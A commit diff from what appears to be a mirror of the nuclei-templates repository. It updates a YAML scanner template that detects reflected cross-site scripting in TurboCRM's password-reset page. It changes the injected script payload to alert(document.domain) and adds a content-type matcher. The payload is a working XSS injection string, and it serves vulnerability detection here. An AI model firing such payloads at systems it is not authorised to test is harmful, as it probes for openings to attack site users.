daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor update

patch-1
sandeep 2021-04-11 17:24:54 +05:30
parent cdac8b34a6
commit d96746d193
1 changed files with 8 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
vulnerabilities/other/turbocrm-xss.yaml
View File

@ -10,16 +10,21 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E' - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '"><script>alert(/XSS/)</script>' - '"><script>alert(document.domain)</script>'
part: body part: body
- type: word
part: header
words:
- "text/html"
- type: status - type: status
status: status:
- 200 - 200